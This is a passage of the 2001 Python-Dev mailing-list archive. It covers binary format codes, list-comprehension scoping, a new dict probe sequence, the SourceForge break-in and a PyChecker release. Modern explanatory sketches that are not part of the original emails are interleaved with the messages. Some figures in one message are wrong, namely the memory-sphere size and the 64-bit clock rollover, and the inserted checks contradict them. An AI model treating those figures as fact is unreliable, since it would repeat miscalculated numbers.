! 		/* Ran out of polynomials or newsize overflowed. */
  		PyErr_NoMemory();
  		return -1;
  	}
--- 434,445 ----
  
  	assert(minused >= 0);
  
! 	/* Find the smallest table size > minused. */
! 	for (newsize = MINSIZE;
! 	     newsize <= minused && newsize >= 0;
! 	     newsize <<= 1)
! 		;
! 	if (newsize < 0) {
  		PyErr_NoMemory();
  		return -1;
  	}
***************
*** 511,517 ****
  	mp->ma_table = newtable;
  	mp->ma_size = newsize;
  	memset(newtable, 0, sizeof(dictentry) * newsize);
- 	mp->ma_poly = newpoly;
  	mp->ma_used = 0;
  	i = mp->ma_fill;
  	mp->ma_fill = 0;
--- 481,486 ----

------=_NextPart_000_0006_01C0E963.C83DC7A0--


From tim.one@home.com  Thu May 31 05:46:56 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 31 May 2001 00:46:56 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530183833.B1654@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIHKFAA.tim.one@home.com>

[ESR]
> The 0xxx notation was copied from PDP-11 assembler literals -- the
> instruction-set design of the PDP-11 was such that most of the
> instruction subfields fit in octal digits, so this convention made it
> somewhat easier to read machine-code dumps.

That doesn't mean they weren't certifiably insane.  At Cray, we had a much
more sensible convention:  *all* numbers were octal (yes, it was a 64-bit
box and octal didn't make any sense, but Seymour Cray got used to it from
the 60-bit CDC w/ 18-bit address registers and didn't feel like changing).
My first boss there loved telling the story about how he was out for a drive
with the family, and excitedly screamed "Hey, kids!  Look!  The odometer is
just about to change to 40,000!".  Of course it read 37,777.9 at the time,
and they thought he was nuts.  That's where this kind of thing always leads
in the end.

to-disgrace-despair-and-eventually-ruin-ly y'rs  - tim


From tim.one@home.com  Thu May 31 05:48:28 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 31 May 2001 00:48:28 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530153858.A21901@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIHKFAA.tim.one@home.com>

[Neil Schemenauer]
> Ever used MacLisp or ZetaLisp?  There:
>
>     777 == 0d511
>
> If only we had been born with 8 or 16 fingers, right?

Then guys would probably be attracted to base 9 or 17.

sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs  - tim


From greg@cosc.canterbury.ac.nz  Thu May 31 06:15:24 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:15:24 +1200 (NZST)
Subject: [Python-Dev] scoping and list comprehensions
In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com>
Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz>

Skip:

>    scope:
>        l = [i**2 for i in range(10)]

By analogy with C, the introducer of a new scope should
simply be an unadorned colon:

  :
    l = [i**2 for i in range(10)]

:-)

While this might be useful, it doesn't really address the issue
raised, because we really need a new scope per listcomp (or
maybe even each 'for' in the listcomp).

> There's also the problem of how to export results from the scope, though
> perhaps the new nested scope stuff provides a solution to that.

Nope -- there's still no way to assign to any name in
an intermediate scope. Something heretical, such as
declarations, would be needed.
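For comparison, here is a small sketch of how both questions were eventually settled in Python 3, not in the 2.1/2.2 line discussed here. A list comprehension gets its own scope, so its loop variable no longer leaks. The `nonlocal` declaration allows assignment to a name in an enclosing function scope. The function names below are made up for illustration.

```python
def listcomp_scope_demo():
    i = "outer"
    # In Python 3 the comprehension's i is local to the comprehension,
    # so it does not overwrite the function's own i.
    squares = [i**2 for i in range(10)]
    return i, squares


def counter():
    count = 0

    def bump():
        # nonlocal rebinds count in counter()'s scope: an assignment to a
        # name in an intermediate scope, which 2.1 had no way to express.
        nonlocal count
        count += 1
        return count

    return bump


i, squares = listcomp_scope_demo()
print(i)            # outer
print(squares[:4])  # [0, 1, 4, 9]

tick = counter()
tick()
print(tick())       # 2
```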

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May 31 06:16:11 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:11 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz>

Tim:

> >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in
>              digits]

Yikes! That would be clearer as

  [[x,y,z] for x in digits for y in digits for z in digits]

I'll concede it's nowhere near as much fun, though...
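Here is a runnable version of the clearer spelling. It assumes `digits` is `[0, 1, 2]`, because the thread doesn't show its definition. For comparison, the standard library's `itertools.product` generates the same triples in the same order.

```python
from itertools import product

digits = [0, 1, 2]  # assumed definition; the original thread doesn't show it

# Nested-for spelling: the rightmost 'for' varies fastest.
base3 = [[x, y, z] for x in digits for y in digits for z in digits]

# The same sequence via itertools.product, converting tuples to lists.
base3_product = [list(t) for t in product(digits, repeat=3)]

print(len(base3))  # 27
print(base3[:4])   # [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0]]
```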

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May 31 06:16:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:41 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>

Tim:

> Needs a PEP, and possibly
> even an associated future-statement.  Overall, I'm more in favor of changing
> it than not.

If we do this, we also need to consider whether we want
to make the corresponding change to regular for-loops.
Seems to me that all the reasons it's a good idea for
listcomps apply to for-loops as well.

Another advantage of changing both together is that
we can continue to describe listcomp semantics in terms
of for-loops instead of lambdas. Then we won't have to go 
into hiding until Guido dies or lifts the fatwah against
us.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May 31 06:17:16 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:17:16 +1200 (NZST)
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>

Tim:

> On the fifth hand, I doubt anyone would want to add new % format codes for
> bases {2..36} - {2, 8, 10, 16}.

So, just add one general one:

  %m.nb

with n being the base. If n defaults to 2, you can read the "b"
as either "base" or "binary".

Literals:

  0b(5)21403       general
  0b11001101       binary

Conversion functions:

  base(x, n)       general
  bin(x)           equivalent to base(x, 2) (for symmetry with
                                             existing hex, oct)

Type slots:

  __base__(x, n)

Backwards compatibility measures:

  hex(x) --> base(x, 16)
  oct(x) --> base(x, 8)
  bin(x) --> base(x, 2)

  base(x, n) checks __hex__ and __oct__ slots for special cases
             of n=16 and n=8, falls back on __base__

There, that takes care of integers. Anyone want to do the
equivalent for floats ?-)
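Below is a minimal pure-Python sketch of what the proposed general `base(x, n)` conversion might look like. The name follows the proposal, but it is hypothetical and not a builtin. The choice to emit no prefix (no "0b" or "0x") is also an assumption. The built-in `int(s, n)` already parses bases 2 through 36, so the sketch uses it only to check round trips.

```python
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def base(x, n=2):
    """Return the integer x written in base n (2 <= n <= 36), no prefix.

    Hypothetical helper modeled on the proposal above.
    """
    if not 2 <= n <= 36:
        raise ValueError("base must be in 2..36")
    if x == 0:
        return "0"
    sign = "-" if x < 0 else ""
    x = abs(x)
    out = []
    while x:
        x, r = divmod(x, n)   # peel off the least significant digit
        out.append(DIGITS[r])
    return sign + "".join(reversed(out))


print(base(205))      # 11001101  (the binary literal above)
print(base(255, 16))  # ff
print(base(1478, 5))  # 21403     (the base-5 literal above)
```

For n=2 this agrees with Python's later `bin()` apart from the `0b` prefix: `bin(205)` is `'0b11001101'`.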

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From esr@thyrsus.com  Thu May 31 07:01:54 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 02:01:54 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200
References: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com> <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <20010531020154.A4404@thyrsus.com>

Greg Ewing <greg@cosc.canterbury.ac.nz>:
> So, just add one general one:
> 
>   %m.nb
> 
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

I had a similar idea, but your version is more elegant.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The common argument that crime is caused by poverty is a kind of
slander on the poor.
	-- H. L. Mencken


From tim_one@email.msn.com  Thu May 31 07:20:21 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:20:21 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIOKFAA.tim_one@email.msn.com>

[Greg Ewing]
> If we do this, we also need to consider whether we want
> to make the corresponding change to regular for-loops.
> Seems to me that all the reasons it's a good idea for
> listcomps apply to for-loops as well.

I expect there's no chance:  unlike listcomps, for-loops allow break
statements, and search loops that use the for index after a break (and out
of the loop!) are common.
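The kind of search loop meant here looks roughly like the sketch below; `first_negative` is a made-up example name. It relies on the loop variables still being bound after `break`. Scoping for-loop variables to the loop body would break code written this way.

```python
def first_negative(values):
    """Return (index, value) of the first negative item, or None."""
    for i, v in enumerate(values):
        if v < 0:
            break
    else:
        return None  # loop ran to completion: nothing found
    # i and v are still bound here, after the loop exited via break.
    return i, v


print(first_negative([3, 1, -4, 1, -5]))  # (2, -4)
print(first_negative([1, 2, 3]))          # None
```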

> Another advantage of changing both together is that
> we can continue to describe listcomp semantics in terms
> of for-loops

But I'm afraid that's also an advantage of leaving both alone.

> instead of lambdas.
>
> Then we won't have to go into hiding until Guido dies or lifts
> the fatwah against us.

Death won't stop him -- he's Dutch <wink>.


From tim_one@email.msn.com  Thu May 31 07:28:04 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:28:04 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIPKFAA.tim_one@email.msn.com>

[Greg Ewing]
> So, just add one general one:
>
>   %m.nb
>
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

Except .n has a different meaning already for integer conversions:

>>> "%.5d" % 2
'00002'
>>> "%.10o" % 377
'0000000571'
>>>

It would be inconsistent to hijack it to mean something else here.

> Literals:
>
>   0b(5)21403       general

I've actually got no use for bases outside {2, 8, 10, 16}, and have never
heard a request for them either, so I'd be at best -0.  Better to stop
documenting the full truth about int() <0.9 wink>.

>   0b11001101       binary

+1.

> Conversion functions:
>
>   base(x, n)       general

-0, as above.

>   bin(x)           equivalent to base(x, 2) (for symmetry with
>                                              existing hex, oct)

+1 if binary literals are added.

> Type slots:
>
>   __base__(x, n)

Given the tenor of the above, add __bin__ and call it a day.

> Backwards compatibility measures:
>
>   hex(x) --> base(x, 16)
>   oct(x) --> base(x, 8)
>   bin(x) --> base(x, 2)
>
>   base(x, n) checks __hex__ and __oct__ slots for special cases
>              of n=16 and n=8, falls back on __base__
>
> There, that takes care of integers. Anyone want to do the
> equivalent for floats ?-)

Note that C99 introduces a hex notation for floats.
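Python itself later exposed the C99 hexadecimal float notation through `float.hex()` and `float.fromhex()`. A quick round-trip check:

```python
x = 0.1
h = x.hex()                      # exact hex representation of the double
print(h)                         # 0x1.999999999999ap-4
print(float.fromhex(h) == x)     # True: the conversion is exact
print(float.fromhex("0x1.8p1"))  # 3.0, i.e. 1.5 * 2**1
```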


From mal@lemburg.com  Thu May 31 08:20:11 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:20:11 +0200
Subject: [Python-Dev] SF hacked
References: <20010531035248.G690@xs4all.nl>
Message-ID: <3B15F0AB.34F2F664@lemburg.com>

Thomas Wouters wrote:
> 
> It *seems*, from this site:
> 
> http://66.92.75.28/~vladimir/themes-org.html
> 
> that SourceForge has been hacked, and more seriously than SF first admits
> (if I'm to believe the arrogant spouting of some script-kiddie, anyway. :)
> And the same goes for apache.org, it looks like. Anyway, if anyone connected
> *from* any of sourceforge's machines to anywhere else, in the last couple of
> months, they'll be well advised to change their passwords and check for
> intruders. The same goes if you connect through ssh and (foolishly ;)
> allowed ssh-agent-forwarding to the SF machines. In that case, better check
> all the machines that ssh-agent would give you unpassworded access to for
> logins you don't recognize. The site above lists a number of sniffed
> passwords, in case you want to check, but there's no reason for the hacker
> not to have even more sniffed passwords lying about :)
> 
> And if you have a login on apache.org, you probably want to change your
> password in any case.... the above listed site has what seems to be a copy
> of the shadow password file.

FYI, it seems the file's contents are no longer available. Still,
SF seems to be alarmed about this:

*****************************************************************************
                I M P O R T A N T   P L E A S E     R E A D
*****************************************************************************

        If you are seeing this it's because we've failed over from
        pr-shell1.

        This is a failover server only.  As soon as pr-shell1 is better we
        will cut back to it.  So please do not start any daemon process
        that you care about.

                                                - The SF Staff


About the password change: this doesn't seem to be possible on
the failover machine (I get a permission denied message).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Thu May 31 08:33:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:33:36 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>
Message-ID: <3B15F3D0.AD646102@lemburg.com>

Tim Peters wrote:
> 
> If anyone has an app known or suspected to be sensitive to dict timing,
> please try the patch here.  Best I've been able to tell, it's a win.  But
> it's a radical change in approach, so I don't want to rush it.
> 
> This gets rid of the polynomial machinery entirely, along with the branches
> associated with updating the things, and the dictobject struct member
> holding the table's poly.  Instead it relies on that
> 
>     i = (5*i + 1) % n
> 
> is a full-period RNG whenever n is a power of 2 (that's what guarantees it
> will visit every slot), but perturbs that by adding in a few bits from the
> full hash code shifted right each time (that's what guarantees every bit of
> the hash code eventually influences the probe sequence, avoiding simple
> quadratic-time degenerate cases).

Cool idea... rips out all that algebra garble and replaces it with 
random beauty :-)

In any case, this will avoid us the trouble of having to check
those poly numbers every time Intel decides to bump the register
width by another factor of two ;-)
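Below is a small Python sketch of the probe idea as described. On its own, the recurrence `i = (5*i + 1) % n` visits every slot when n is a power of 2. Higher hash bits, shifted in on each step, perturb that sequence. The perturbation details are illustrative assumptions, not necessarily what the patch does: a shift of 5 bits and adding `perturb` into the recurrence.

```python
def bare_probe(start, n):
    """Yield n slots from the recurrence i = (5*i + 1) % n."""
    i = start
    for _ in range(n):
        yield i
        i = (5 * i + 1) % n


def perturbed_probe(hash_value, n, steps, shift=5):
    """Yield `steps` slots, mixing higher hash bits into each step.

    Assumes n is a power of 2 and hash_value >= 0; shift=5 is an assumed
    parameter. Once perturb reaches 0 this reduces to bare_probe, so
    every slot is eventually visited.
    """
    mask = n - 1                 # i & mask == i % n for power-of-2 n
    i = hash_value & mask
    perturb = hash_value
    for _ in range(steps):
        yield i
        perturb >>= shift
        i = (5 * i + 1 + perturb) & mask


for n in (8, 16, 1024):
    assert sorted(bare_probe(0, n)) == list(range(n))  # full period

print(list(bare_probe(0, 8)))  # [0, 1, 6, 7, 4, 5, 2, 3]
```

The full period holds because a linear congruential step `a*i + c` modulo a power of 2 cycles through every residue when `c` is odd and `a % 4 == 1`, and `a=5, c=1` satisfies both.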

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr@thyrsus.com  Thu May 31 09:43:32 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 04:43:32 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com>
Message-ID: <20010531044332.B5026@thyrsus.com>

M.-A. Lemburg <mal@lemburg.com>:
> In any case, this will avoid us the trouble of having to check
> those poly numbers every time Intel decides to bump the register
> width by another factor of two ;-)

This seems unlikely.  

2^64 = 18446744073709551616, which is roughly 10 ^ 19.  Let's assume 
a memory density of, say, 2^20 machine words or roughly 8 megabytes per 
cubic centimeter (much, *much* better than we'll be able to do for the 
foreseeable future -- remember power distribution and heat dissipation).
Then, approximating the cubic relation between a sphere's volume and area 
by lopping off a power of four, we see that 2^64 64-bit words of memory 
would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 
17 million kilometers.  

This is roughly twice the diameter of the Sun.  64-bit computers
aren't going to run out of address space any time soon.
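The volume estimate above can be redone in a few lines of Python under the assumptions it states. These are 2^20 64-bit words (8 MB) per cubic centimeter, and a sphere's volume approximated as 4r^3. The sketch makes the cube-root step from volume to radius explicit. The density figure is the message's assumption, not a measurement.

```python
import math

words = 2**64            # 2^64 addressable 64-bit words
words_per_cm3 = 2**20    # assumed density: 8 MB per cubic centimeter

volume_cm3 = words / words_per_cm3       # 2^44 cubic centimeters
radius_cm = (volume_cm3 / 4) ** (1 / 3)  # V ~= 4 r^3, so r = (V/4)^(1/3)

print(math.log2(volume_cm3))  # 44.0
print(round(radius_cm))       # 16384, i.e. 2^14 cm
print(radius_cm / 100)        # radius in meters
```

With these inputs the radius is the cube root of 2^42 cm^3, about 2^14 cm or roughly 160 m.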

64-bit clocks counting seconds will turn over in approximately six
trillion years, long after the expansion of the Universe will have
dropped its energy density low enough to make computation...well, 
let's just say "difficult" and leave it at that.
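The counter rollover is similarly quick to compute. This sketch assumes a 365.25-day year. It shows both an unsigned 64-bit count of seconds and a signed one, as in a typical 64-bit time_t.

```python
SECONDS_PER_YEAR = 365.25 * 24 * 60 * 60   # Julian year: 31,557,600 s

unsigned_years = 2**64 / SECONDS_PER_YEAR  # unsigned 64-bit counter
signed_years = 2**63 / SECONDS_PER_YEAR    # signed 64-bit counter

print(f"{unsigned_years:.3e}")  # 5.845e+11
print(f"{signed_years:.3e}")    # 2.923e+11
```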

Nobody needs 128 bits of integer or floating-point precision, either.
There's basically no source of data to compute with that's got
anywhere near 22 significant digits of accuracy -- 48 bits is
about the most people in scientific computing ever use.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

[President Clinton] boasts about 186,000 people denied firearms under
the Brady Law rules.  The Brady Law has been in force for three years.  In
that time, they have prosecuted seven people and put three of them in
prison.  You know, the President has entertained more felons than that at
fundraising coffees in the White House, for Pete's sake."
	-- Charlton Heston, FOX News Sunday, 18 May 1997


From mal@lemburg.com  Thu May 31 10:23:52 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 11:23:52 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <3B160DA8.B9FF9AC2@lemburg.com>

"Eric S. Raymond" wrote:
> 
> M.-A. Lemburg <mal@lemburg.com>:
> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)
> 
> This seems unlikely.
> 
> 2^64 = 18446744073709551616, which is roughly 10 ^ 19.  Let's assume
> a memory density of, say, 2^20 machine words or roughly 8 megabytes per
> cubic centimeter (much, *much* better than we'll be able to do for the
> foreseeable future -- remember power distribution and heat dissipation).

Where did you get those numbers from ? There are memory sticks
with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

> Then, approximating the cubic relation between a sphere's volume and area
> by lopping off a power of four, we see that 2^64 64-bit words of memory
> would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about
> 17 million kilometers.
> 
> This is roughly twice the diameter of the Sun.  64-bit computers
> aren't going to run out of address space any time soon.
> 
> 64-bit clocks counting seconds will turn over in approximately six
> trillion years, long after the expansion of the Universe will have
> dropped its energy density low enough to make computation...well,
> let's just say "difficult" and leave it at that.
> 
> Nobody needs 128 bits of integer or floating-point precision, either.
> There's basically no source of data to compute with that's got
> anywhere near 22 significant digits of accuracy -- 48 bits is
> about the most people in scientific computing ever use.

Just you wait... someday marketing people will probably invent the
world memory facility and start assigning a few hundred
Terabytes for everyone on this planet to use for his/her data 
storage -- store once, use everywhere ;-)

Let's assume we have 12e9 people on this planet by that time, then
we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
roughly 2^80 bytes per civilization.

Of course, they will want to run Python in order to manage
that data and so will all those Palm users hooking up to the
facility... ;-)
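The storage arithmetic is easy to check, using the message's own inputs: 12e9 people and 100 TB (100e12 bytes) each.

```python
import math

people = 12e9        # assumed future population, from the message
bytes_each = 100e12  # 100 TB per person, as in the calculation
total = people * bytes_each

print(f"{total:.1e}")           # 1.2e+24
print(round(math.log2(total)))  # 80
```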

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr@thyrsus.com  Thu May 31 11:31:07 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 06:31:07 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com>
Message-ID: <20010531063107.B5510@thyrsus.com>

M.-A. Lemburg <mal@lemburg.com>:
> > 2^64 = 18446744073709551616, which is roughly 10 ^ 19.  Let's assume
> > a memory density of, say, 2^20 machine words or roughly 8 megabytes per
> > cubic centimeter (much, *much* better than we'll be able to do for the
> > foreseeable future -- remember power distribution and heat dissipation).
> 
> Where did you get those numbers from ? There are memory sticks
> with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

Remember power distribution and heat dissipation.  You can't just figure 
volume of the memory ICs, you have to include power and cooling and structural
support too.  I eyeballed some DRAM modules I had lying around.

In any case, my figures aren't that sensitive to memory density.  If
I'm off by a factor of 64, the diameter of the memory sphere only drops
by a factor of four (it's that cube-root relationship between volume
and radius).  So it's only half the radius of the Sun.  That's still
way, *way* more mass than all the planets in the Solar System put
together.

> Just you wait... someday marketing people will probably invent the
> world memory facility and start assigning a few hundred
> Terabytes for everyone on this planet to use for his/her data 
> storage -- store once, use everywhere ;-)
> 
> Let's assume we have 12e9 people on this planet by that time, then
> we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
> roughly 2^80 bytes per civilization.

Nah.  Individual storage requirements would never get that large.
Bill Joy did a study on this once and figured out that human beings
can generate about 14GB of text during their lifetimes, max.  In a
system like the Web-on-steroids one you're supposing, higher-volume
stuff like streaming video or Linux-kernel archives would be stored
*once* with URLs pointing at them from people's individual stores.

One terabyte (2^40) per person leaves plenty of headroom (two orders
of magnitude larger).  We could still handle a world population of
2^24 or roughly 16 billion people.  (I think the size of the Library
of Congress has been estimated at several thousand terabytes.)
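The per-person split can be checked directly. The sketch assumes byte addressing and exactly 2^40 bytes per person.

```python
address_space = 2**64  # bytes addressable with 64-bit byte pointers
per_person = 2**40     # one (binary) terabyte per person

people = address_space // per_person
print(people == 2**24)  # True
print(f"{people:,}")    # 16,777,216
```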
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

I don't like the idea that the police department seems bent on keeping
a pool of unarmed victims available for the predations of the criminal
class.
         -- David Mohler, 1989, on being denied a carry permit in NYC


From thomas@xs4all.net  Thu May 31 11:45:33 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 12:45:33 +0200
Subject: [Python-Dev] One more dict trick
In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <20010531124533.J690@xs4all.nl>

On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote:
> M.-A. Lemburg <mal@lemburg.com>:

> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)

> This seems unlikely.  

Why ? Bumping register size doesn't mean Intel expects to use it all as
address space. They could be used for video-processing, or to represent a
modest range of rationals <wink>, or to help core 'net routers deal with
those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger
registers as well.

Oh wait... I get it! You were trying to get yourself in the history books as
the guy that said "64 bits ought to be enough for everyone" :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From PyChecker <pychecker@metaslash.com>  Wed May 30 03:49:45 2001
From: PyChecker <pychecker@metaslash.com> (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <mailman.991257181.1069.clpa-moderators@python.org>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in Python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of Python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

In most cases, code that makes PyChecker raise an exception should now be
caught and reported as a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all
greatly appreciated.  Thanks to everyone who has taken the time to mail me.
If you can think of common mistakes that PyChecker doesn't find, please
let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on SourceForge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker@metaslash.com


From beazley@cs.uchicago.edu  Thu May 31 14:34:57 2001
From: beazley@cs.uchicago.edu (David Beazley)
Date: Thu, 31 May 2001 08:34:57 -0500 (CDT)
Subject: [Python-Dev] RE: Iteration variables and list comprehensions
In-Reply-To: <E155KrW-00029v-00@mail.python.org>
References: <E155KrW-00029v-00@mail.python.org>
Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu>

Greg Ewing writes: 
 > Another advantage of changing both together is that
 > we can continue to describe listcomp semantics in terms
 > of for-loops instead of lambdas.

Is this really an advantage?  To me, the lambda semantics are a lot
more intuitive in terms of matching the way that list comprehensions
are actually used and ought to work (although I will agree that the
for-loop explanation is a good way to describe the internals of what a
list comprehension actually does).

I think I would be opposed to changing normal for-loop semantics to
match any change made in list-comprehensions. There are too many cases
where you use a loop variable after finishing a loop and I suspect
that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever: break

    print i

Besides, the semantic mismatch created between a listcomp and a
for-loop pales in comparison to the mismatch that currently exists
between the behavior of listcomps and all of the other operators.  Of
course, that's just my opinion--I could be wrong.

 > Then we won't have to go 
 > into hiding until Guido dies or lifts the fatwah against us.

fatwah?  Uh...  should I start talking to the witness protection
program folks?

Cheers,

Dave


From skip@pobox.com (Skip Montanaro)  Thu May 31 19:02:51 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 13:02:51 -0500
Subject: [Python-Dev] Re: 2.1 strangness
